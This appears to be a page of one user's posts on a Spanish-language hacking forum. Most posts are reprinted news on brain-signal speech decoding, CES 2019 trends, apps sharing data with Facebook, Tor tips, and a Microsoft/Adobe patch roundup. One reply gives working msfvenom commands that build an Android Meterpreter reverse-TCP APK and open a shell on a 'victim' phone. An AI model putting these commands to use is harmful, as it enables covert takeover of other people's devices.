No es nada fácil "escuchar al cerebro"

Pero, para mejorar esos resultados, se enfrentan a tres problemas:

El modo en que estas señales se traducen en sonidos del habla varía de una persona a otra, por lo que la IA debe estar entrenada para cada individuo en particular.

La IA funciona mejor cuando se le alimenta con datos extremadamente precisos, lo que explica que haya que abrir abrir el cráneo para instalar los electrodos. Pero para los investigadores sólo es posible realizar ese experimento aprovechando intervenciones para solventar dolencias previas (tumores cerebrales, esquizofrenia, etc).

¿Cómo funcionarán estas IAs cuando se trabaje directamente con personas que no pueden hablar? Las señales cerebrales que no están acompañadas de un sonido externo que coincida con la actividad cerebral pueden ser difícil de interpretar para una computadora (por ejemplo, se dificulta reconocer donde empieza y termina esta 'habla interna').

Decodificar el discurso pensando requerirá dar "un gran salto", en palabras de Gerwin Schalk, neurólogo del Centro Nacional de Neurotecnologías Adaptativas en el Departamento de Salud del Estado de Nueva York.

Pero, si la empresa tiene éxito, se espera no ya sólo que logren recrear las frases que piensen, sino también poder captar y expresar otros aspectos del habla, como el tono o la inflexión.

Vía | Science

2236
Inteligencia Artificial y BioHacking / Las 5 tendencias del CES 2019
« on: January 04, 2019, 02:12:32 am »
Las 5 tendencias del CES 2019, del 5G a la realidad inmersiva pasando por la voz de Google y Alexa



CES 2019 se centrará en tecnologías innovadoras (5G, realidad inmersiva y confianza digital) que proporcionan lo último en personalización y experiencia para el usuario final, haciendo posible un ecosistema conectado a través de ciudades y hogares inteligentes y una nueva generación de automóviles. Las empresas invertirán más para garantizar una mayor seguridad y privacidad de los datos con la tecnología blockchain como base, mientras que los asistentes de voz como Google y Alexa protagonizarán gran parte de los debates de CES 2019 . La AR (realidad aumentada), la VR (realidad virtual) y la XR (realidad extendida) entrarán a formar parte de nuestras vidas. Estos son los temas que centrarán la atención de CES 2019, que se celebrará en Las Vegas a partir del 8 de enero. Adolfo Rodero, managing director del sector de Comunicaciones y Media de Accenture, da las claves.

Tema 1. 5G conectando todo

El CES 2019 presentará este año la siguiente etapa en 5G, con una visión tangible de los beneficios que ofrece esta tecnología para las industrias de todo el mundo y la proliferación de dispositivos que recopilan datos en cualquier momento y lugar, y lo que todo ello conlleva para las empresas y el usuario final. La tecnología 5G es un requisito clave para hacer posible la implementación de innovaciones como los vehículos autónomos, el avance de las ciudades inteligentes y el IoT que lo conecta todo.

CES 2019 se centrará en tecnologías innovadoras (5G, realidad inmersiva y confianza digital) que proporcionan lo último en personalización y experiencia para el usuario final
Si bien el número de hogares conectados aumentará, los consumidores optarán por diferentes alternativas para personalizar sus hogares conectados, lo que influirá en las plataformas y la forma de uso en cada mercado. Las marcas deberán responder a la inquietud de los consumidores sobre la forma en que utilizan sus datos, haciendo que se sientan seguros y cómodos en un hogar verdaderamente conectado, ya que esto impactará en la toma de decisión al elegir un producto y en su fidelidad.

En la actualidad, todas las miradas están puestas en el mercado de las telecomunicaciones y varias ciudades importantes de Estados Unidos (Houston, Los Ángeles, Sacramento e Indianápolis, por citar algunas) ya disponen de tecnología 5G para Internet en casa. La carrera está en marcha a gran velocidad y proveedores de servicios inalámbricos como Verizon, T-Mobile, Spring y AT&T ya han anunciado su intención de establecer redes completas 5G por todo Estados Unidos.

En España hemos sido testigos del alto interés generado por los pilotos 5G lanzados por el gobierno y próximamente podremos ver varias pruebas piloto durante el Mobile World Congress en Barcelona.

La mayoría de los fabricantes de teléfonos móviles afirman que lanzarán sus esperados teléfonos 5G a principios de 2019, momento en el que los consumidores pueden esperar un servicio inalámbrico sin igual, con velocidades nunca antes imaginadas. La cuestión será quién cruzará antes la línea de meta sin ninguna experiencia negativa para el usuario final.

Tema 2. AR, VR y XR: la realidad inmersiva pasa a ser la tendencia dominante/marca tendencia

La tecnología inmersiva afectará a la forma en la que los productores de contenidos, las marcas y una amplia variedad de industrias se dirigen al mercado.

Respecto a la VR, los consumidores la están llevando a sus hogares a la velocidad de la luz, a medida que viven la experiencia y comprueban sus beneficios. El foco este año se centra en la carrera por fabricar los auriculares autónomos con el formato más adecuado para el usuario final en el esfuerzo por atraer a un público que está tardando en adaptarse a la RV. Hasta la fecha hay siete millones de auriculares de RV en los hogares americanos, solamente el 6 %, aunque ha experimentado un incremento del 25 % de 2017 a 2018.

La VR ha afectado prácticamente a todos los sectores, permitiendo al usuario final sumergirse en miles de experiencias en las industrias de la música, la moda y el entretenimiento.

En lo que respecta a la AR, los teléfonos y las tabletas ya no son el único lugar para esta tecnología, como sucedió cuando Pokemon Go lanzó esta tecnología al gran público con su competitivo juego experiencial. El objetivo de la AR es proporcionar una inmersión cómoda y natural, por lo que el debate se centrará en su mejora continua, con los rumores sobre la desaparición de teléfonos y tabletas, y en los problemas políticos y éticos relacionados con la privacidad a medida que más consumidores introducen la AR en sus vidas.

CES 2019 ofrecerá experiencias en AR/VR en todas las industrias y en todas las formas imaginables para llevar a las personas a lugares en los que nunca han estado y para traer productos a su mundo como nunca se había hecho antes.

Respecto a la XR, los juegos y el entretenimiento han sido los que más han utilizado esta tecnología hasta la fecha. Sin embargo, el uso de dispositivos de XR que se pueden llevar puestos y las aplicaciones móviles de soporte pasarán a formar parte del estilo de vida, incluidos los parques temáticos, los centros turísticos/hoteleros y la formación continua, lo que traerá una revolución a un sector de tanta importancia en nuestro país como el turístico. La XR se ha definido como la combinación de los entornos de AR y VR con tecnologías inmersivas mejoradas, o la fusión de los mundos físico y virtual que cambiará la forma en la que vivimos, trabajamos y jugamos.

Los consumidores que ya experimentan los beneficios de la XR estarán abiertos a introducirla en otros ámbitos de sus vidas. La XR generará de forma natural beneficios para los consumidores en industrias adicionales como la salud, con muchos profesionales expertos conscientes de cómo la XR puede mejorar la atención al paciente en el tratamiento de muchas enfermedades y diversas generaciones.

Tema 3. La confianza digital, en primer plano

La confianza digital será un tema prioritario en la CES 2019, ya que cada vez más hogares están conectados y un mayor número de personas dependen de DVA (asistentes de voz digitales), que están siempre a la escucha, y de los servicios que prestan (asesoramiento médico, gestión financiera, etc.). El uso de los datos y la confianza digital aparecen cada vez más en primer plano.

En general, y al calor de los cada vez más numerosos escándalos, los consumidores se han vuelto más precavidos y más rigurosos respecto a la ética de las empresas y sus prácticas de privacidad y seguridad de los datos, por lo que esperan un mayor control sobre quién tiene acceso a su localización y a otros datos privados.

En relación con esta cuestión el uso en aumento de la tecnología blockchain en el sector de los media continúa resolviendo desafíos relacionados con la compartición de datos de los consumidores y la gestión de derechos digitales, con un enfoque esencial en qué es accesible y qué es privado y para gestionar la propiedad y el control de datos valiosos. A principios de 2019, más de la mitad de los grupos de media utilizarán la tecnología blockchain o abordarán estrategias para implementarla y si bien el nivel de adopción en España es menor es previsible que se acelerará como resultado de las ventajas y simplificación que su aplicación está generando en grupos internacionales. La experiencia en los mismos apunta a que  blockchain  es una solución revolucionaria y definitiva para los crecientes costes de la tecnología publicitaria y las horas dedicadas a conciliar los informes de pagos posteriores a las campañas, ayudando a la industria a obtener un ROI más tangible que anima a los anunciantes a invertir más en 2019 y en años posteriores.

Tema 4. Dispositivos habilitados por voz y Alexa

A medida que la popularidad de los altavoces inteligentes Amazon Echo aumenta, cada vez más marcas y empresas están lanzando productos con asistentes de voz digitales (DVA). La mayoría de los electrodomésticos, incluidos los televisores inteligentes, dispondrán de tecnología de voz, presentada en la CES como un integrante del hogar inteligente. Los televisores y los dispositivos de streaming se conectarán con reproductores de Blu-ray con control de audio para ayudar a mejorar la experiencia cinematográfica del usuario final. La CES 2019  incluirá productos habilitados por la voz, tanto nuevos como mejorados, que son más asequibles y adecuados para los consumidores. Por ejemplo, prácticamente todos los dispositivos relacionados con la cocina incluirán un comando de voz.

Otros dispositivos para el hogar que se mostrarán en la CES 2019 son espejos, duchas y lámparas inteligentes activados por la voz, que ayudarán a personalizar los baños del hogar para cualquier tipo de usuario, enchufe, cargador, interruptor de luz y prácticamente cualquier dispositivo electrónico. Cuantas más compañías adopten el comando de voz, pronto habrá más dispositivos que se activen de esta forma tanto dentro como fuera del hogar (en vehículos y en áreas públicas), en comparación con los dispositivos y productos no activables por la voz. A medida que Alexa se vaya incorporando a más dispositivos, el mayor reto y preocupación será saber en cuáles tiene más sentido la activación por la voz y en cuáles no.

Tema 5. Automóviles autónomos e innovaciones tecnológicas para vehículos

Las “cualidades internas/inherentes” de los asistentes virtuales, comandos de voz y automóviles conectados como extensiones de nuestros hogares inteligentes aumentarán su importancia a medida que la nueva tecnología de conectividad se incorpore a nuestros vehículos y, finalmente, los convierta en el tan anunciado “tercer lugar”. En este tema esperamos una nueva gama de soluciones en la CES 2019, junto con un verdadero esfuerzo para crear experiencias de automóvil verdaderamente personalizadas por medio de la inteligencia artificial y de otras soluciones que permitirán a los automóviles aprender las preferencias del conductor y darles respuesta.

Otro tema importante al que prestar atención es la movilidad inteligente, o cómo los automóviles se convertirán en una parte integral del sistema de movilidad intermodal que se está poniendo en marcha actualmente. Las nuevas soluciones harán que el uso compartido del vehículo, el automóvil con conductor y la “movilidad multimodal” sean aún más convenientes, eficientes en costes y sostenibles. Todo apunta también a que la carrera hacia el vehículo “totalmente autónomo” pasará a su siguiente etapa este año. Esta tendencia tiene especial importancia en Europa en general y en España en particular al contemporizarla con la renovación tecnológica que es está impulsando desde las instituciones vía políticas mucho más estrictas de control de las emisiones y apoyo a tecnologías limpias, que incrementa la inversión necesaria para adquisición y reduce los plazos de obsolescencia y vida útil.

Algunas de las tecnologías clave relacionadas que se podrán ver en la CES este año son versiones mejoradas de LiDAR (detección de distancia por láser), soluciones de reconocimiento fotográfico y de imágenes para vehículos autónomos y soluciones de almacenamiento, gestión, clasificación y recuperación de datos de capacitación, muchas de las cuales no provendrán de actores establecidos, sino de start-ups y de empresas ajenas al sector automovilístico. La 5G, otra de las tecnologías habilitadoras para los automóviles autónomos, desempeñará también un papel clave en esta feria, con los proveedores de redes y las empresas de telecomunicaciones preparándose para el lanzamiento del estándar de alta velocidad.

Via: revistabyte.es

2237
Un informe de la ONG británica Privacy International asegura que Duolingo, Spotify, Trip Advisor o Skyscanner comparten información personal de los usuarios con la compañía que dirige Mark Zukerberg




Spotify, Trip Advisor, Duolingo, Kayak o Shazam. Si tienes algunas de estas aplicaciones instaladas en tu móvil, ten mucho cuidado. Y es que según un informe « How Apps on Android Share Data with Facebook» («Cómo las aplicaciones de Android comparten datos con Facebook»), de la ONG británica Privacy International, estas «apps» ceden los datos personales de los usuarios a la compañía que preside Mark Zuckerberg, independientemente de que tengas cuenta o no en Facebook, apenas la utilices o haga mucho que no entras.

La red social «realiza un seguimiento rutinario de usuarios, no usuarios y usuarios desconectados fuera de su plataforma a través de sus herramientas comerciales», concluye el estudio tras analizar los datos de 34 aplicaciones de Android, con una base de instalación de 10 a 500 millones, entre los meses de agosto y diciembre de 2018.

Para entender cómo se comparten los datos de usuarios, el informe ha analizado la actividad de los desarrolladores de aplicaciones, que comparten con la red social los datos a través del Kit de desarrollo de software (SDK) de Facebook, un conjunto de herramientas de que ayudan a los desarrolladores a crear aplicaciones para un sistema operativo específico (Android, en este caso).

«Descubrimos que al menos el 61% por ciento de las aplicaciones que probamos transfieren datos a Facebook en el momento en que un usuario abre la aplicación», asegura la ONG. Esto sucede tanto si el usuarios tiene o no cuenta, o ha iniciado o no sesión.

Perfiles de usuarios

En líneas generales, las aplicaciones que transmiten automáticamente datos a Facebook comparten dicha información junto con un identificador único: el ID de publicidad de Google (AAID) para «permitir a los anunciantes vincular los datos sobre el comportamiento de los usuarios desde diferentes aplicaciones y la navegación web a un perfil completo». Así, al combinar los datos, «pueden pintar una imagen detallada e íntima de las actividades, intereses, comportamientos y rutinas de las personas, algunas de las cuales pueden revelar datos de categorías especiales, incluida la información sobre la salud o la religión de las personas». Privacy International ejemplifica cómo una persona que tenga instalada en su terminal la «app» Qibla Connect (de oración musulmana), Period Tracker Clue (un rastreador de período), Indeed (una aplicación de búsqueda de empleo) y My Talking Tom (una aplicación para niños), permite a Facebook elaborar un perfil de ese usuario: mujer, musulmana y madre en búsqueda de empleo.

«También encontramos que algunas aplicaciones envían de forma rutinaria datos a Facebook que son increíblemente detallados y, a veces, sensibles», añade la ONG. Se refiere «a los datos de las personas que han cerrado sesión en Facebook o que no tienen cuenta», añade. Tal es el caso de la «app» Kayak, de búsqueda de viajes y de comparación de precios, «que envía información detallada sobre las búsquedas de vuelos a Facebook, que incluyen: ciudad de salida, aeropuerto de salida, fecha de salida, ciudad de llegada, aeropuerto de llegada, fecha de llegada, número de billetes (incluido el número de niños) y tipo de billetes.

Otra de las graves conclusiones que expone Privacy International es que aunque la política de cookies de Facebook expone dos formas con las que los usuarios que no tienen cuenta pueden controlar el uso que hace Facebook con las cookies para enviar publicidad dirigida, el organismo asegura que, tras probarlas, «no tuvieron un impacto perceptible en el intercambio de datos que hemos descrito en este informe».

Estas son las aplicaciones que, según Privacy International , comparten datos con Facebook:


1. MyFitnessPal (contador de calorías)

2. Duolingo (idiomas)

3. Indeed (búsqueda de empleo)

4. Localizador Familiar y Movil

5. Ritmo Cardíaco - Monitor Pulso

6. KAYAK

7. King James Bible (KJV) Free (Biblia)

8. Muslim Pro - Horas del rezo, Athan, Corán y Quibla

9. Mi Talking Tom (juego de mascota virtual)

10. Clue Calendario menstrual y de ovulación

11. Encuentra dirección de Qibla

12. Shazam (para identificar música)

13. Skyscanner – Vuelos, hoteles y coches

14. Spotify: música y podcasts

15. Linterna

16. Tiempo - The Weather Channel

17. TripAdvisor: hoteles, restaurantes, vuelos

18. VK (red social)

19. Yelp (guía)

20. صلاتك Salatuk (Prayer time) (indica el tiempo Oración, las mezquitas más cercanas y la dirección a la Qibla)

Respuesta de los afectados

Tras el estudio, las propias compañías afectadas no han tardado en reaccionar. Skyscanner, por ejemplo, al verse implicado, lanzó una actualización de la «app» que «detendrá la transmisión» de datos. «Como resultado de esto, auditaremos todo nuestro seguimiento de consentimiento y estamos comprometido a realizar los cambios necesarios para garantizar que los derechos de privacidad de los viajeros se respeten plenamente», asegura.

«Spotify apuesta por la transparencia y la equidad», indica la compañía. «Estamos trabajando para evaluar los hallazgos técnicos de Privacy International. También evaluaremos si se deben hacer cambios en la Integración con Facebook».

Esta investigación tiene su razón de ser en un momento en el que Facebook atraviesa por su peor crisis a raíz del escándalo de Cambridge Analytica en 2018. Fue entonces cuando EE.UU. y Europa se preguntaron acerca del seguimiento que realiza Facebook. «Por estos motivos, en este informe planteamos preguntas sobre la transparencia y el uso de los datos de aplicaciones que consideramos oportunos e importantes», indica Privacy International.

Una vez más, la compañía que preside Mark Zuckerberg se estaría saltando el Reglamento General de Protección de Datos (GDPR) de la UE, que entró en vigor en 2018.

Facebook se defiende y asigna la responsabilidad exclusiva a los desarrolladores de aplicaciones, cuyo trabajo debe garantizar que tengan el derecho legítimo de recopilar, usar y compartir los datos. Sin embargo, las herramientas de Facebook no siempre dejan margen a los desarrolladores, y transmiten de forma automática los datos, señala la ONG.

En otras investigaciones previas, se ha demostrado «cómo el 42,55% de las aplicaciones gratuitas en la Google Play comparten datos con Facebook, lo que convierte a la red social en el segundo rastreador de terceros, después de Google», indica la ONG.


Fuente:abc.es

2238
Dudas y pedidos generales / Re:Ayuda con payload
« on: January 02, 2019, 06:51:09 pm »
Por lo que entiendo, tu quieres conseguir una shell remota infectando a un android con un payload lo puedes generar con msfvenom por tanto intuyo que la aplicación/payload se crea correctamente, y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a  traves de la meterpreter conseguir una shell remota?
si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android  victima con comandos linux y ya esta.

ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload?


Ejemplo:

el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería:

"msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk"


Espero te sirva.

2239
Hacking / Consejos para quienes utilizan la Red Tor por primera vez.
« on: December 13, 2018, 07:42:22 pm »
La Deep Web o también conocida como Internet profunda alberga millones de páginas web que no están indexadas en los buscadores convencionales como Google o Bing. Ello significa que no es un contenido visible para los motores de búsqueda y por tal motivo, esconde sitios web que no quieren que sean descubiertos.

Según los expertos, es unas 400 veces mayor que la web superficial, y es conocida por esconder actividades relacionadas con la delincuencia, pero también alberga webs de datos científicos, bases de datos de gobiernos, documentos, imágenes o vídeos. Si deseas adentrarte en ella puedes hacerlo a través de la denominada red Tor, pero debes saber que también corres determinados riesgos, por lo que conviene que tengas en cuenta las siguientes recomendaciones.



NO UTILIZAR TOR CON WINDOWS

Nunca utilices Windows como navegador cuando decidas adentrarte a la red Tor. Esta Internet profunda se ejecuta bien con el sistema Linux y es más seguro.

NO INCLUIR INFORMACIÓN PERSONAL

Ni correo electrónico, nombre, direcciones, número de teléfono, ni por supuesto, tarjeta de crédito, deben de desvelarse en la Deep Weeb. No sirve de nada que navegues por una red encriptada si revelas datos reales por los que puedan identificarte.

NO INICIAR SESIÓN EN FACEBOOK

No debes iniciar nunca sesiones en las redes sociales en las que tengas cuenta, tales como Facebook, Twitter o Instagram. Siempre podrás correr el riesgo de que alguien te identifique. Tampoco entres en webs comerciales ni muestres nunca tu cuenta del banco.

NO ACCEDAS A CUENTAS PERSONALES

No accedas a cuentas personales a través de la red Tor porque los ciberdelincuentes podrán intentar acceder a tu dirección IP, o seguir el rastro de tu historial de búsquedas.

EVITA BUSCAR EN GOOGLE

No realices búsquedas en Google desde la red Tor. El gigante de los buscadores utiliza nuestro rastro para enviarnos publicidad y en la Internet profunda debes de usar otros buscadores. Algunas alternativas son Startpage o DuckDuckGo.

DESACTIVA JAVASCRIPT, FLASH Y JAVA

La Deep Web puede proteger casi todo tipo de información, pero no la que circula a través de JavaScript, Adobe Flash o Java. Estas herramientas tienen ciertos privilegios en tu ordenador y pueden descubrir tu identidad a partir de ellas.

NO MODIFIQUES LA CONFIGURACIÓN DE LAS APLICACIONES

Modificar la configuración de las apps que tengas instaladas (en el caso de que accedas a través de latablet o móvil), es algo que tampoco debes hacer jamás en la red Tor. Harán que tu rastro sea sencillo de seguir.

NO VISITES TU SITIO WEB O BLOG

Si tienes un blog o web personal con visitas no accedas a ellos desde la Deep Weeb. Pueden identificarnos como el responsable gracias al relay de salidas. Además, debes colocar una extensión que elimine de forma automática las cookies de los sitios web que visites. Todas las precauciones son pocas.

NO ALTERNES TOR CON WIFI ABIERTO

No debes alternar Tor con una red de WiFi abierto. Utiliza ambos elementos a la vez para que ningúndistribuidor o ciberdelincuente pueda identificar nuestra dirección de IP del Mac o PC.

NO TE OLVIDES DEL CIFRADO DE EXTREMO A EXTREMO

Muy importante es no olvidarte de enviar toda la información cifrada y de forma segura. Tor encripta tu conexión pero no tus datos. Para asegurarte, LUKS ofrece protección de datos en sistemas Linux,y TrueCrypt también se puede utilizar para cifrar archivos y datos de forma segura.


2240

Se avecinan múltiples parches de actualización

Los administradores de sistemas trabajarán tiempo extra durante los próximos días festivos. Según especialistas en forense digital del Instituto Internacional de Seguridad Cibernética, el próximo conjunto de parches de actualización que lanzará Microsoft incluye correcciones para nueve vulnerabilidades consideradas críticas, incluyendo la reparación de una vulnerabilidad día cero.

Además de los 39 errores reportados por Microsoft, los administradores deberán mantenerse a la expectativa del lanzamiento de los parches de actualización para los 87 bugs reportados por Adobe. El más relevante (CVE-2018-8611) se trata de un error de escalada de privilegios que afecta a todos los sistemas operativos compatibles desde Windows 7 a Server 2019. Esta vulnerabilidad permitiría a un actor malicioso ejecutar código arbitrario en el modo kernel.

“Antes de explotar esta vulnerabilidad el posible atacante tendría que iniciar sesión en el sistema. El atacante podría ejecutar una aplicación especialmente diseñada para tomar control del sistema comprometido”, mencionan expertos en forense digital.

Un anuncio de seguridad de Microsoft agrega: “Un atacante que explote con éxito esta vulnerabilidad podría ejecutar código arbitrario en modo kernel para instalar programas; ver, cambiar, o eliminar datos; o crear nuevas cuentas con todos los privilegios de usuario”. Otro error destacado es CVE-2018-8517, una vulnerabilidad útil para generar condiciones DDoS en aplicaciones web.

“La vulnerabilidad podría ser explotada de forma remota y sin autenticación mediante la emisión de una solicitud especialmente diseñada para la aplicación vulnerable”, explicó Chris Goettl, experto en seguridad informática y forense digital.

“La explotación de esta vulnerabilidad es considerada demasiado compleja, sin embargo, al haber sido públicamente revelada, podría haber suficiente información disponible para que un actor malicioso pueda idear un modo más sencillo de explotar el error”, menciona el experto.

Allan Liska, especialista en ciberseguridad, destaca que entre las vulnerabilidades que serán corregidas próximamente se encuentra un bug de desbordamiento en el servidor DNS de Microsoft (CVE-2018-8626), además de múltiples errores críticos en el motor de scripting Microsoft Edge Chakra Core.

“Ya son quince meses consecutivos en los que Microsoft informa sobre una vulnerabilidad en el motor de secuencias de comandos Chakra. La última vez que Microsoft dejó intacto el motor de scripting Chakra fue en septiembre de 2017”, señaló Liska.

En esta ocasión, Chakra presenta dos vulnerabilidades de corrupción de memoria (CVE-2018-8583 y CVE-2018-8629) que permitirían a un hacker la ejecución de código arbitrario en el sistema de la víctima.

Los expertos también recomendaron a las empresas que trabajan con Adobe a instalar los parches de actualización a la brevedad, especialmente los dirigidos a las vulnerabilidades CVE-2018-15982 y CVE-2018-15983, dos errores día cero en Adobe Flash que ya han sido explotados en ambientes reales.



Via: noticiasseguridad.com

Pages: 1 ... 110 111 [112] 113 114